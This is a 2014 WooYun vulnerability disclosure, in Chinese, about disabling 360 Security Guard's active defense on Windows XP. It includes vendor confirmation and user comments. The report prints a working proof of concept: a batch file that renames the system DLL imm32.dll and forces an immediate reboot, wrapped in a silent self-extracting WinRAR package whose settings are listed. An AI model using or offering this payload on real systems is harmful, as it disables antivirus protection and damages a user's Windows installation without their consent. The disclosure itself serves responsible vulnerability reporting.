当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084700

漏洞标题:XP系统下轻松干掉360安全卫士主防进阶篇(不止360哦)

相关厂商:奇虎360

漏洞作者: zhuixing

提交时间:2014-12-09 19:29

修复时间:2015-03-09 19:30

公开时间:2015-03-09 19:30

漏洞类型:拒绝服务

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-09: 细节已通知厂商并且等待厂商处理中
2014-12-10: 厂商已经确认,细节仅向厂商公开
2014-12-13: 细节向第三方安全合作伙伴开放
2015-02-03: 细节向核心白帽子及相关领域专家公开
2015-02-13: 细节向普通白帽子公开
2015-02-23: 细节向实习白帽子公开
2015-03-09: 细节向公众公开

简要描述:

不需要额外和复杂的程序代码,只用系统自身的功能就使360安全卫士主进程无法启动。

详细说明:

最终修正版!抛弃有争议的部分,只留关键代码。
参测软件:360安全卫士最新官方下载独立安装包
测试环境:VMware Workstation 10.0.3,Windows XP SP3 Pro
测试方法:360安全卫士以默认方式安装,开启和升级所有防护+引擎,重启系统然后运行漏洞测试程序。
安装文件数字签名图

360.PNG


测试录像下载地址:http://pan.baidu.com/s/1o6skD5o,提取码:d0wu,解压密码:360poc123。
代码说明:
创建如下批处理文件1.bat:
@echo off
ipconfig&shutdown -r -t 00&ren c:\windows\system32\imm32.dll imm32.dl
pause
把1.bat用winrar打包成一个自解压自执行程序,注释如下:
Path=.\poc
SavePath
Setup=1.bat
TempMode
Silent=1
Overwrite=1
惊喜地发现类似原理还能做很多有意思的事情。
不过这个漏洞测试方法在同一系统下只能成功执行一次,重复使用就无效了,原因不明。

漏洞证明:

测试录像下载地址:http://pan.baidu.com/s/1o6skD5o,提取码:d0wu,解压密码:360poc123。

修复方案:

事情有时不需要想得太复杂。

版权声明:转载请注明来源 zhuixing@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-10 11:32

厂商回复:

感谢白帽子的报告,我们确认此问题是360主动防御中部分组件存在的防护缺陷,主动防护可能被该攻击方式绕过,我们将尽快修复此问题。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-09 19:39 | 小鲜肉 ( 实习白帽子 | Rank:34 漏洞数:6 | 努力学习,不想在浪费时间了。)

    其他微软版本通杀么?

  2. 2014-12-09 19:48 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    第二弹拉!~前排

  3. 2014-12-09 20:53 | laoyao ( 路人 | Rank:14 漏洞数:5 | ด้้้้้็็็็็้้้้้็็็็...)

    等待 (( /|_/| \\.._.' , ,\ /\ | '.__ v / 坐等公开

  4. 2014-12-09 21:24 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    @光刃 一起学习

  5. 2014-12-09 21:38 | mlyKnown ( 路人 | Rank:2 漏洞数:1 | 咚咚咚咚,查水表啦。)

    @泳少 难道用那个工具搞出来的?

  6. 2014-12-09 21:38 | mlyKnown ( 路人 | Rank:2 漏洞数:1 | 咚咚咚咚,查水表啦。)

    @泳少 难道用那个工具搞出来的?

  7. 2014-12-09 22:21 | CTAA ( 路人 | Rank:30 漏洞数:5 | 么么哒)

    360表示:我还可以被抢救一下下

  8. 2014-12-09 22:22 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

    坐等公开嘿嘿

  9. 2014-12-09 23:03 | test233 ( 路人 | Rank:0 漏洞数:1 | 这真的就是简介)

    为什么洞主不留着参加xp靶场挑战赛呢。。。http://xp.erangelab.com/

  10. 2014-12-09 23:41 | 小鲜肉 ( 实习白帽子 | Rank:34 漏洞数:6 | 努力学习,不想在浪费时间了。)

    @zhuixing 看了大神的前面发布的漏洞,都是在system权限下进行的,用命令强制结束掉进程,以前提权还用过这招呢,我怎么就没有想过发布上来,不知道大神又想到了什么新的办法,有没有不是system强制结束杀软的主动防御,那个才牛逼。

  11. 2014-12-10 00:34 | zhuixing ( 实习白帽子 | Rank:50 漏洞数:9 | 纯纯的小白。)

    @test233 之前不知道呀,这个洞审核了快一个月了,汗……

  12. 2014-12-10 00:40 | zhuixing ( 实习白帽子 | Rank:50 漏洞数:9 | 纯纯的小白。)

    @小鲜肉 只针对XP系统,其他没测。

  13. 2014-12-10 01:22 | 狼狗 ( 路人 | 还没有发布任何漏洞 | 我来到这里是为了国家各个互联网安全。学习...)

    确实给力。

  14. 2014-12-10 07:39 | Mr.Black ( 路人 | 还没有发布任何漏洞 | 爱好WEB安全 爱好个人信息安全)

    等待大神

  15. 2014-12-10 11:00 | test233 ( 路人 | Rank:0 漏洞数:1 | 这真的就是简介)

    @zhuixing 大神赶紧报名参加吧~~

  16. 2014-12-10 11:55 | mj0011 ( 路人 | 还没有发布任何漏洞 | 360safe security researcher & programmer)

    @test233 XP挑战赛可没那么容易,就不说前面那些难度更高的执行缓和,就算到了后面的沙箱,楼主的这个玩意也没啥用。

  17. 2014-12-10 13:06 | lnterface ( 实习白帽子 | Rank:41 漏洞数:12 | 还没想好嘛!)

    坐等公开

  18. 2014-12-17 11:53 | mlyKnown ( 路人 | Rank:2 漏洞数:1 | 咚咚咚咚,查水表啦。)

    @mj0011 MJ也现身了?

  19. 2015-03-10 09:52 | 穿山甲 ( 路人 | Rank:4 漏洞数:1 | 处于学习阶段,跟老师傅学习中。。。)

    确实不难,但是绝对想不到,赞一个